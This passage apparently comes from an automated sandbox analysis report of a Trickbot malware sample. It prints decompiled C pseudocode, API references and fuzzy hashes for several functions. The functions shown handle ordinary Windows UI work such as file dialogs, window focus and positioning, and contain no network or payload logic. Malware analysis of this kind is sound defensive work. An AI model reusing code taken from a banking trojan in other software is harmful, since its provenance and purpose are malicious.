                          				signed int _t44;
                          				signed int _t53;
                          				void* _t56;
                          
                          				_t41 = __ebx;
                          				_t53 = _t44;
                          				E00405360(lstrlenA( *(_t53 + 0x78)) + 1 +  *(_t53 + 0x78), 0,  *((intOrPtr*)(_t53 + 0x7c)) - lstrlenA( *(_t53 + 0x78)) + 1);
                          				_v8 = GetFocus();
                          				 *(_t53 + 0x60) = E004177D2(_t53);
                          				E00418D4C();
                          				_t28 =  *(_t53 + 0x60);
                          				_t56 = EnableWindow;
                          				if(_t28 != 0 && IsWindowEnabled(_t28) != 0) {
                          					_push(1);
                          					_pop(0);
                          					EnableWindow( *(_t53 + 0x60), 0);
                          				}
                          				_push(_t41);
                          				_t42 = E00432335();
                          				if(( *(_t53 + 0x92) & 0x00000008) == 0) {
                          					E00418D00(_t56, _t53);
                          				} else {
                          					 *(_t42 + 0x18) = _t53;
                          				}
                          				_push(_t53 + 0x5c);
                          				if( *((intOrPtr*)(_t53 + 0xa8)) == 0) {
                          					_t32 = GetSaveFileNameA();
                          				} else {
                          					_t32 = GetOpenFileNameA();
                          				}
                          				 *(_t42 + 0x18) =  *(_t42 + 0x18) & 0x00000000;
                          				_v4 = _t32;
                          				if(0 != 0) {
                          					EnableWindow( *(_t53 + 0x60), 1);
                          				}
                          				_t33 = IsWindow(_v8);
                          				_t65 = _t33;
                          				if(_t33 != 0) {
                          					SetFocus(_v8);
                          				}
                          				E0041780C(_t53, _t53, _t65);
                          				_t35 = _v4;
                          				if(_t35 == 0) {
                          					_t36 = 2;
                          					return _t36;
                          				}
                          				return _t35;
                          			}

                          APIs
                          • lstrlenA.KERNEL32(?), ref: 00415C8A
                          • GetFocus.USER32 ref: 00415CA5
                            • Part of subcall function 00418D4C: UnhookWindowsHookEx.USER32(?), ref: 00418D71
                          • IsWindowEnabled.USER32(?), ref: 00415CCE
                          • EnableWindow.USER32(?,00000000), ref: 00415CE0
                          • GetOpenFileNameA.COMDLG32(?), ref: 00415D0B
                          • GetSaveFileNameA.COMDLG32(?), ref: 00415D12
                          • EnableWindow.USER32(?,00000001), ref: 00415D29
                          • IsWindow.USER32(00000000), ref: 00415D2F
                          • SetFocus.USER32(00000000), ref: 00415D3D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
                          • String ID:
                          • API String ID: 3606897497-0
                          • Opcode ID: 58ef713467245c72f238f1a804a6061d6d9588cd32768a9e30d3b494f40a0663
                          • Instruction ID: 79e5f807bf0caf71d0d310ba7aa660e886a6a09820b170437658e05476853557
                          • Opcode Fuzzy Hash: 58ef713467245c72f238f1a804a6061d6d9588cd32768a9e30d3b494f40a0663
                          • Instruction Fuzzy Hash: 57219571214B00ABDB116F76EC4ABDB77E4EF84314F10442FF55285291DBB9D880CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042BD2C(void* __eflags, signed int _a4, intOrPtr _a8) {
                          				struct HWND__* _v4;
                          				void* __ecx;
                          				struct HWND__* _t26;
                          				int _t30;
                          				struct HWND__* _t36;
                          				int* _t37;
                          				intOrPtr* _t38;
                          				intOrPtr* _t43;
                          
                          				_t43 = _t38;
                          				if(( *(E0042BD0C(_t38, __eflags) + 4) & 0x00002020) == 0) {
                          					L8:
                          					return E004187B4(_t43);
                          				}
                          				_t36 = GetDlgItem( *(_t43 + 0x1c), _a4);
                          				if(_t36 == 0 || (GetWindowLongA(_t36, 0xfffffff0) & 0x10000000) == 0 || IsWindowEnabled(_t36) == 0) {
                          					_a4 = _a4 & 0x00000000;
                          					_t37 = 0x43a1d0;
                          					while(1) {
                          						_t26 = GetDlgItem( *(_t43 + 0x1c),  *_t37);
                          						_v4 = _t26;
                          						if((GetWindowLongA(_t26, 0xfffffff0) & 0x10000000) != 0 && IsWindowEnabled(_v4) != 0) {
                          							break;
                          						}
                          						_a4 = _a4 + 1;
                          						_t37 =  &(_t37[1]);
                          						if(_t37 < 0x43a1e0) {
                          							continue;
                          						}
                          						goto L8;
                          					}
                          					_t30 = IsWindowEnabled(GetFocus());
                          					__eflags = _t30;
                          					if(_t30 == 0) {
                          						SetFocus(_v4);
                          					}
                          					return  *((intOrPtr*)( *_t43 + 0xa0))(0x401, 0x43a1d0[_a4], _a8);
                          				} else {
                          					goto L8;
                          				}
                          			}

                          0x0042bd31
                          0x0042bd3e
                          0x0042bdb0
                          0x00000000
                          0x0042bdb2
                          0x0042bd55
                          0x0042bd59
                          0x0042bd72
                          0x0042bd77
                          0x0042bd7c
                          0x0042bd81
                          0x0042bd86
                          0x0042bd91
                          0x00000000
                          0x00000000
                          0x0042bda1
                          0x0042bda5
                          0x0042bdae
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0042bdae
                          0x0042bdc6
                          0x0042bdcc
                          0x0042bdce
                          0x0042bdd4
                          0x0042bdd4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • GetDlgItem.USER32(?,?), ref: 0042BD4D
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0042BD5E
                          • IsWindowEnabled.USER32(00000000), ref: 0042BD68
                          • GetDlgItem.USER32(?,0043A1D0), ref: 0042BD81
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0042BD8A
                          • IsWindowEnabled.USER32(?), ref: 0042BD97
                          • GetFocus.USER32 ref: 0042BDBF
                          • IsWindowEnabled.USER32(00000000), ref: 0042BDC6
                          • SetFocus.USER32(?), ref: 0042BDD4
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Enabled$FocusItemLong
                          • String ID:
                          • API String ID: 1558694495-0
                          • Opcode ID: 346d1fefbcdf2b0c84f7d75174d67adafc0a4d144e6aa3e53e4e89fc608e0462
                          • Instruction ID: 03df39c33ee63731004a16e8f88fe2e2a825fb355146438892ea3cbb40895504
                          • Opcode Fuzzy Hash: 346d1fefbcdf2b0c84f7d75174d67adafc0a4d144e6aa3e53e4e89fc608e0462
                          • Instruction Fuzzy Hash: A611E431204311AFDB119F65EC88B9BBBA8EF54350F54552AF882822B1CB75CC50DB99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00411880() {
                          				intOrPtr* _t1;
                          				short _t2;
                          				int _t3;
                          				int _t4;
                          				int _t5;
                          				int _t6;
                          				int _t7;
                          				int _t8;
                          				int _t9;
                          
                          				EnterCriticalSection(0x44d320);
                          				_t1 = 0x44dda0;
                          				do {
                          					if( *_t1 != 0) {
                          						 *_t1 = 0;
                          					}
                          					_t1 = _t1 + 0x18;
                          				} while (_t1 < 0x44de30);
                          				_t2 = E004108C0();
                          				if( *0x44d348 != 0) {
                          					_t9 =  *0x44d348; // 0x0
                          					_t2 = GlobalDeleteAtom(_t9);
                          				}
                          				if( *0x44d34e != 0) {
                          					_t8 =  *0x44d34e; // 0x0
                          					_t2 = GlobalDeleteAtom(_t8);
                          				}
                          				if( *0x44d34c != 0) {
                          					_t7 =  *0x44d34c; // 0x0
                          					_t2 = GlobalDeleteAtom(_t7);
                          				}
                          				if( *0x44d34a != 0) {
                          					_t6 =  *0x44d34a; // 0x0
                          					_t2 = GlobalDeleteAtom(_t6);
                          				}
                          				if( *0x44d352 != 0) {
                          					_t5 =  *0x44d352; // 0x0
                          					_t2 = GlobalDeleteAtom(_t5);
                          				}
                          				if( *0x44d350 != 0) {
                          					_t4 =  *0x44d350; // 0x0
                          					_t2 = GlobalDeleteAtom(_t4);
                          				}
                          				if( *0x44d354 != 0) {
                          					_t3 =  *0x44d354; // 0x0
                          					_t2 = GlobalDeleteAtom(_t3);
                          				}
                          				 *0x44d340 = 0;
                          				LeaveCriticalSection(0x44d320);
                          				return _t2;
                          			}

                          0x00411886
                          0x0041188c
                          0x00411891
                          0x00411894
                          0x00411896
                          0x00411896
                          0x0041189c
                          0x0041189f
                          0x004118a6
                          0x004118b3
                          0x004118b5
                          0x004118c2
                          0x004118c2
                          0x004118d4
                          0x004118d6
                          0x004118dd
                          0x004118dd
                          0x004118e7
                          0x004118e9
                          0x004118f0
                          0x004118f0
                          0x004118fa
                          0x004118fc
                          0x00411903
                          0x00411903
                          0x0041190d
                          0x0041190f
                          0x00411916
                          0x00411916
                          0x00411920
                          0x00411922
                          0x00411929
                          0x00411929
                          0x00411933
                          0x00411935
                          0x0041193c
                          0x0041193c
                          0x0041193e
                          0x0041194d
                          0x00411954

                          APIs
                          • EnterCriticalSection.KERNEL32(0044D320,?,00410CDF), ref: 00411886
                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 004118C2
                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 004118DD
                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 004118F0
                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 00411903
                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 00411916
                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 00411929
                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 0041193C
                          • LeaveCriticalSection.KERNEL32(0044D320,?,00410CDF), ref: 0041194D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3843206905-0
                          • Opcode ID: 4a4ff4071e3fd4a90b9e6e5060e217e030cefc0afe1d29e14aa23069c225a3e7
                          • Instruction ID: c3654da1d49b8deecb46209bad9f12e927e857b5048a0aadf628bbfb555053b7
                          • Opcode Fuzzy Hash: 4a4ff4071e3fd4a90b9e6e5060e217e030cefc0afe1d29e14aa23069c225a3e7
                          • Instruction Fuzzy Hash: 051115ADD0061491D7257FE4EC097EA37B8A74A704F088436EE10476B0D7BC48CACBAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E004272D6(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
                          				struct tagRECT _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				struct tagRECT _v44;
                          				char _v304;
                          				void* __ebp;
                          				int _t69;
                          				signed char _t72;
                          				signed char _t77;
                          				signed int _t82;
                          				signed int _t84;
                          				void* _t90;
                          				struct HWND__* _t94;
                          				intOrPtr _t122;
                          				intOrPtr _t130;
                          				void* _t142;
                          				signed char _t143;
                          				signed char _t145;
                          				intOrPtr _t147;
                          				void* _t149;
                          
                          				_t142 = __edx;
                          				_t147 = _a4;
                          				_t122 = __ecx;
                          				_t69 = GetWindowRect( *(_t147 + 0x1c),  &_v44);
                          				if( *((intOrPtr*)(_t147 + 0x70)) != _t122) {
                          					_t143 = 0;
                          					__eflags = 0;
                          					L5:
                          					if( *((intOrPtr*)(_t122 + 0x78)) != _t143 && ( *(_t147 + 0x68) & 0x00000040) != 0) {
                          						 *(_t122 + 0x64) =  *(_t122 + 0x64) | 0x00000040;
                          					}
                          					 *(_t122 + 0x64) =  *(_t122 + 0x64) & 0xfffffff9;
                          					_t72 =  *(_t147 + 0x64) & 0x00000006 |  *(_t122 + 0x64);
                          					 *(_t122 + 0x64) = _t72;
                          					if((_t72 & 0x00000040) == 0) {
                          						E0041B72C(_t147,  &_v304, 0x104);
                          						E004226A8( *(_t122 + 0x1c),  &_v304);
                          					}
                          					_t77 = ( *(_t122 + 0x64) ^  *(_t147 + 0x64)) & 0x0000f000 ^  *(_t147 + 0x64) | 0x0000000f;
                          					if( *((intOrPtr*)(_t122 + 0x78)) == _t143) {
                          						_t78 = _t77 & 0x000000fe;
                          						__eflags = _t77 & 0x000000fe;
                          					} else {
                          						_t78 = _t77 | 0x00000001;
                          					}
                          					E00433299(_t147, _t78);
                          					_v28 = _t143;
                          					if( *((intOrPtr*)(_t147 + 0x70)) != _t122 && IsWindowVisible( *(_t147 + 0x1c)) != 0) {
                          						E0041B784(_t147, _t143, _t143, _t143, _t143, _t143, 0x97);
                          						_v28 = 1;
                          					}
                          					_v24 = _v24 | 0xffffffff;
                          					if(_a8 == _t143) {
                          						_t144 = _t122 + 0x7c;
                          						E00416B4D(_t122 + 0x7c,  *((intOrPtr*)(_t122 + 0x84)), _t147);
                          						E00416B4D(_t122 + 0x7c,  *((intOrPtr*)(_t144 + 8)), 0);
                          						_t82 =  *0x44b30c; // 0x2
                          						_t145 = 0;
                          						__eflags = 0;
                          						_t84 =  *0x44b308; // 0x2
                          						E0041B784(_t147, 0,  ~_t84,  ~_t82, 0, 0, 0x115);
                          					} else {
                          						CopyRect( &_v20, _a8);
                          						E0042147E(_t122,  &_v20);
                          						asm("cdq");
                          						asm("cdq");
                          						_push((_v20.bottom - _v20.top - _t142 >> 1) + _v20.top);
                          						_push((_v20.right - _v20.left - _t142 >> 1) + _v20.left);
                          						asm("movsd");
                          						asm("movsd");
                          						_push(_a4);
                          						asm("movsd");
                          						asm("movsd");
                          						_v24 = E00427EA1(_t122);
                          						E0041B784(_a4, 0, _v20.left, _v20.top, _v20.right - _v20.left, _v20.bottom - _v20.top, 0x114);
                          						_t147 = _a4;
                          						_t145 = 0;
                          					}
                          					if(E0041884D(_t149, GetParent( *(_t147 + 0x1c))) != _t122) {
                          						if(_t122 != _t145) {
                          							_t94 =  *(_t122 + 0x1c);
                          						} else {
                          							_t94 = 0;
                          						}
                          						E0041884D(_t149, SetParent( *(_t147 + 0x1c), _t94));
                          					}
                          					_t130 =  *((intOrPtr*)(_t147 + 0x70));
                          					_t165 = _t130 - _t122;
                          					if(_t130 != _t122) {
                          						__eflags = _t130 - _t145;
                          						if(_t130 == _t145) {
                          							goto L33;
                          						}
                          						__eflags =  *((intOrPtr*)(_t122 + 0x78)) - _t145;
                          						if( *((intOrPtr*)(_t122 + 0x78)) == _t145) {
                          							L30:
                          							__eflags = 0;
                          							L31:
                          							_push(0);
                          							_push(0xffffffff);
                          							goto L32;
                          						}
                          						__eflags =  *((intOrPtr*)(_t130 + 0x78)) - _t145;
                          						if(__eflags != 0) {
                          							goto L30;
                          						}
                          						_push(1);
                          						_pop(0);
                          						goto L31;
                          					} else {
                          						_push(_t145);
                          						_push(_v24);
                          						L32:
                          						_push(_t147);
                          						E00427749(_t130, _t165);
                          						L33:
                          						_t166 = _v28 - _t145;
                          						 *((intOrPtr*)(_t147 + 0x70)) = _t122;
                          						if(_v28 != _t145) {
                          							E0041B784(_t147, _t145, _t145, _t145, _t145, _t145, 0x57);
                          						}
                          						E004276E8(_t122, _t147);
                          						_t90 = E0042EDF5(_t122, _t166);
                          						 *(_t90 + 0xb8) =  *(_t90 + 0xb8) | 0x0000000c;
                          						return _t90;
                          					}
                          				}
                          				_t143 = 0;
                          				if(_a8 != 0) {
                          					_t69 = EqualRect( &_v44, _a8);
                          					if(_t69 == 0) {
                          						goto L5;
                          					}
                          				}
                          				return _t69;
                          			}

                          0x004272d6
                          0x004272e1
                          0x004272ec
                          0x004272ee
                          0x004272f7
                          0x0042731b
                          0x0042731b
                          0x0042731d
                          0x00427320
                          0x00427328
                          0x00427328
                          0x0042732c
                          0x00427339
                          0x0042733d
                          0x00427340
                          0x00427350
                          0x0042735f
                          0x0042735f
                          0x00427373
                          0x00427379
                          0x0042737f
                          0x0042737f
                          0x0042737b
                          0x0042737b
                          0x0042737b
                          0x00427384
                          0x0042738c
                          0x0042738f
                          0x004273aa
                          0x004273af
                          0x004273af
                          0x004273b6
                          0x004273bd
                          0x0042743a
                          0x00427443
                          0x0042744f
                          0x00427454
                          0x00427459
                          0x00427459
                          0x00427465
                          0x00427470
                          0x004273bf
                          0x004273c6
                          0x004273d2
                          0x004273e0
                          0x004273f0
                          0x004273f8
                          0x004273f9
                          0x00427401
                          0x00427402
                          0x00427403
                          0x00427406
                          0x00427407
                          0x0042740d
                          0x0042742e
                          0x00427433
                          0x00427436
                          0x00427436
                          0x00427486
                          0x0042748a
                          0x00427490
                          0x0042748c
                          0x0042748c
                          0x0042748c
                          0x0042749e
                          0x0042749e
                          0x004274a3
                          0x004274a6
                          0x004274a8
                          0x004274b0
                          0x004274b2
                          0x00000000
                          0x00000000
                          0x004274b4
                          0x004274b7
                          0x004274c3
                          0x004274c3
                          0x004274c5
                          0x004274c5
                          0x004274c6
                          0x00000000
                          0x004274c6
                          0x004274b9
                          0x004274bc
                          0x00000000
                          0x00000000
                          0x004274be
                          0x004274c0
                          0x00000000
                          0x004274aa
                          0x004274aa
                          0x004274ab
                          0x004274c8
                          0x004274c8
                          0x004274c9
                          0x004274ce
                          0x004274ce
                          0x004274d1
                          0x004274d4
                          0x004274df
                          0x004274df
                          0x004274e7
                          0x004274ee
                          0x004274f3
                          0x00000000
                          0x004274f3
                          0x004274a8
                          0x004272f9
                          0x004272fe
                          0x0042730b
                          0x00427313
                          0x00000000
                          0x00427319
                          0x00427313
                          0x004274fe

                          APIs
                          • GetWindowRect.USER32(?,?), ref: 004272EE
                          • EqualRect.USER32(?,?), ref: 0042730B
                            • Part of subcall function 0041B784: SetWindowPos.USER32(?,?,?,00000015,000000FF,000000FF,?), ref: 0041B7AB
                          • IsWindowVisible.USER32(?), ref: 00427394
                          • CopyRect.USER32(?,?), ref: 004273C6
                          • GetParent.USER32(?), ref: 00427478
                          • SetParent.USER32(?,?), ref: 00427497
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: RectWindow$Parent$CopyEqualVisible
                          • String ID: @
                          • API String ID: 3103310903-2766056989
                          • Opcode ID: 45252a3016a8dda825642b9806041828bc335e3bf2ebc2175d017ae3332ace23
                          • Instruction ID: c013e57d3912e20942472ec6bb72c044c9e9542d13c4ab745a507247cd5121f0
                          • Opcode Fuzzy Hash: 45252a3016a8dda825642b9806041828bc335e3bf2ebc2175d017ae3332ace23
                          • Instruction Fuzzy Hash: B861E231B04615EFCF20EF69DC85AAFBBB9EF84304F50452EF912962A1C7789941CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 38%
                          			E00427501(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
                          				struct tagRECT _v20;
                          				struct tagRECT _v36;
                          				char _v296;
                          				void* __ebp;
                          				int _t61;
                          				signed char _t64;
                          				signed char _t69;
                          				void* _t79;
                          				struct HWND__* _t81;
                          				intOrPtr _t109;
                          				signed int _t115;
                          				signed int _t117;
                          				void* _t130;
                          				signed int _t131;
                          				intOrPtr _t134;
                          				void* _t136;
                          
                          				_t130 = __edx;
                          				_t134 = _a4;
                          				_t109 = __ecx;
                          				_t61 = GetWindowRect( *(_t134 + 0x1c),  &_v36);
                          				if( *((intOrPtr*)(_t134 + 0x70)) != _t109) {
                          					L3:
                          					if( *((intOrPtr*)(_t109 + 0x78)) != 0 && ( *(_t134 + 0x68) & 0x00000040) != 0) {
                          						 *(_t109 + 0x64) =  *(_t109 + 0x64) | 0x00000040;
                          					}
                          					 *(_t109 + 0x64) =  *(_t109 + 0x64) & 0xfffffff9;
                          					_t64 =  *(_t134 + 0x64) & 0x00000006 |  *(_t109 + 0x64);
                          					 *(_t109 + 0x64) = _t64;
                          					if((_t64 & 0x00000040) == 0) {
                          						E0041B72C(_t134,  &_v296, 0x104);
                          						E004226A8( *(_t109 + 0x1c),  &_v296);
                          					}
                          					_t69 = ( *(_t109 + 0x64) ^  *(_t134 + 0x64)) & 0x0000f000 ^  *(_t134 + 0x64) | 0x0000000f;
                          					if( *((intOrPtr*)(_t109 + 0x78)) == 0) {
                          						_t70 = _t69 & 0x000000fe;
                          						__eflags = _t69 & 0x000000fe;
                          					} else {
                          						_t70 = _t69 | 0x00000001;
                          					}
                          					E00433299(_t134, _t70);
                          					_t131 = E00427E16(_t109, GetDlgCtrlID( *(_t134 + 0x1c)) & 0x0000ffff, 0xffffffff);
                          					if(_t131 > 0) {
                          						 *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x80)) + _t131 * 4)) = _t134;
                          					}
                          					if(_a8 == 0) {
                          						__eflags = _t131 - 1;
                          						if(_t131 < 1) {
                          							_t132 = _t109 + 0x7c;
                          							E00416B4D(_t109 + 0x7c,  *((intOrPtr*)(_t109 + 0x84)), _t134);
                          							E00416B4D(_t109 + 0x7c,  *((intOrPtr*)(_t132 + 8)), 0);
                          						}
                          						_t115 =  *0x44b30c; // 0x2
                          						__eflags = 0;
                          						_push(0x115);
                          						_push(0);
                          						_push(0);
                          						_push( ~_t115);
                          						_t117 =  *0x44b308; // 0x2
                          						_push( ~_t117);
                          						_push(0);
                          					} else {
                          						CopyRect( &_v20, _a8);
                          						E0042147E(_t109,  &_v20);
                          						if(_t131 < 1) {
                          							asm("cdq");
                          							asm("cdq");
                          							_push((_v20.bottom - _v20.top - _t130 >> 1) + _v20.top);
                          							_push((_v20.right - _v20.left - _t130 >> 1) + _v20.left);
                          							asm("movsd");
                          							asm("movsd");
                          							_push(_a4);
                          							asm("movsd");
                          							asm("movsd");
                          							E00427EA1(_t109);
                          							_t134 = _a4;
                          						}
                          						_push(0x114);
                          						_push(_v20.bottom - _v20.top);
                          						_push(_v20.right - _v20.left);
                          						_push(_v20.top);
                          						_push(_v20.left);
                          						_push(0);
                          					}
                          					E0041B784(_t134);
                          					if(E0041884D(_t136, GetParent( *(_t134 + 0x1c))) != _t109) {
                          						if(_t109 != 0) {
                          							_t81 =  *(_t109 + 0x1c);
                          						} else {
                          							_t81 = 0;
                          						}
                          						E0041884D(_t136, SetParent( *(_t134 + 0x1c), _t81));
                          					}
                          					_t120 =  *((intOrPtr*)(_t134 + 0x70));
                          					_t153 =  *((intOrPtr*)(_t134 + 0x70));
                          					if( *((intOrPtr*)(_t134 + 0x70)) != 0) {
                          						E00427749(_t120, _t153, _t134, 0xffffffff, 0);
                          					}
                          					 *((intOrPtr*)(_t134 + 0x70)) = _t109;
                          					_t79 = E0042EDF5(_t109, _t153);
                          					 *(_t79 + 0xb8) =  *(_t79 + 0xb8) | 0x0000000c;
                          					return _t79;
                          				}
                          				if(_a8 != 0) {
                          					_t61 = EqualRect( &_v36, _a8);
                          					if(_t61 == 0) {
                          						goto L3;
                          					}
                          				}
                          				return _t61;
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                           • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Parent$CopyCtrlEqualWindow
                          • String ID: @
                          • API String ID: 3581194824-2766056989
                          • Opcode ID: eb752216d629d721ef81a2f569ba0f31a8e54fe6635466f30bbdf336c63728ad
                          • Instruction ID: 6e204e71504efc12537ac9430bac7e5aed1844e1737930437afc70cf03ad7d0f
                          • Opcode Fuzzy Hash: eb752216d629d721ef81a2f569ba0f31a8e54fe6635466f30bbdf336c63728ad
                          • Instruction Fuzzy Hash: 4851BC71704625EFCF14DFA8DC85AAE77AAEF44314F40452EF911DA2A1CB78E841CB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E0041A296(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
                          				int _v8;
                          				intOrPtr _v12;
                          				int _v16;
                          				int _v20;
                          				struct tagRECT _v36;
                          				void* _v40;
                          				void* __ebp;
                          				int _t56;
                          				intOrPtr* _t57;
                          				signed short _t62;
                          				void* _t63;
                          				void* _t67;
                          				intOrPtr* _t80;
                          				signed int _t83;
                          				struct HWND__* _t86;
                          				void* _t87;
                          
                          				_t67 = __ecx;
                          				_v8 = 0;
                          				_v12 = _a28;
                          				_v16 = 0;
                          				_v20 = 0;
                          				if(_a24 == 0) {
                          					GetClientRect( *(__ecx + 0x1c),  &_v36);
                          				} else {
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          				}
                          				if(_a16 == 1) {
                          					_v40 = _v40 & 0x00000000;
                          				} else {
                          					_v40 = BeginDeferWindowPos(8);
                          				}
                          				_t56 = GetTopWindow( *(_t67 + 0x1c));
                          				_t86 = _t56;
                          				while(_t86 != 0) {
                          					_t62 = GetDlgCtrlID(_t86);
                          					_push(_t86);
                          					_t83 = _t62 & 0x0000ffff;
                          					_t63 = E00418874();
                          					if(_t83 != _a12) {
                          						if(_t83 >= _a4 && _t83 <= _a8 && _t63 != 0) {
                          							SendMessageA(_t86, 0x361, 0,  &_v40);
                          						}
                          					} else {
                          						_v8 = _t86;
                          					}
                          					_t56 = GetWindow(_t86, 2);
                          					_t86 = _t56;
                          				}
                          				if(_a16 != 1) {
                          					if(_a12 != 0 && _v8 != 0) {
                          						_t57 = E0041884D(_t87, _v8);
                          						if(_a16 == 2) {
                          							_t80 = _a20;
                          							_v36.left = _v36.left +  *_t80;
                          							_v36.top = _v36.top +  *((intOrPtr*)(_t80 + 4));
                          							_v36.right = _v36.right -  *((intOrPtr*)(_t80 + 8));
                          							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t80 + 0xc));
                          						}
                          						 *((intOrPtr*)( *_t57 + 0x60))( &_v36, 0);
                          						_t56 = E0041A3D0( &_v40, _v8,  &_v36);
                          					}
                          					if(_v40 != 0) {
                          						_t56 = EndDeferWindowPos(_v40);
                          					}
                          				} else {
                          					if(_a28 == 0) {
                          						_t56 = _a20;
                          						 *((intOrPtr*)(_t56 + 8)) = _v20;
                          						 *((intOrPtr*)(_t56 + 4)) = 0;
                          						 *_t56 = 0;
                          						 *((intOrPtr*)(_t56 + 0xc)) = _v16;
                          					} else {
                          						_t56 = CopyRect(_a20,  &_v36);
                          					}
                          				}
                          				return _t56;
                          			}

                          APIs
                          • GetClientRect.USER32(?,?), ref: 0041A2C9
                          • BeginDeferWindowPos.USER32(00000008), ref: 0041A2D7
                          • GetTopWindow.USER32(?), ref: 0041A2E9
                          • GetDlgCtrlID.USER32(00000000), ref: 0041A2F8
                          • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 0041A32A
                          • GetWindow.USER32(00000000,00000002), ref: 0041A333
                          • CopyRect.USER32(?,?), ref: 0041A34F
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                           • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
                          • String ID:
                          • API String ID: 3332788312-0
                          • Opcode ID: c585fcbf80c8228befd741fc4a9a19b30d35f75822540120c6c310733a15aff0
                          • Instruction ID: b3ce3c85b3990ca3c2a80dc1803e56427cde69241eddf32b77d962f9067b73e5
                          • Opcode Fuzzy Hash: c585fcbf80c8228befd741fc4a9a19b30d35f75822540120c6c310733a15aff0
                          • Instruction Fuzzy Hash: D7417D3190620DEFCF14DF94D9849EEB7B5FF08311B14416BE812A7210C7789EA0CBAA
